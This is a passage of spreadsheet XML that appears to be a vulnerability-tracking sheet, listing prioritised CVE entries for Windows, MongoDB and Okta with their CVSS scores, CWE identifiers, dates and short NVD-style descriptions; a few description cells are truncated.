    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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4" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K305" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80093</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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06" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K307" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S307"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T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83940</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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8" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K309" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85360</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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0" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68833</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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1" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69415</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K312" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69490</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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3" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69566</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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4" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71329</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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5" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71348</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77892</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78451</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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18" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78579</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S319"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T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71339</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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0" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78625</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
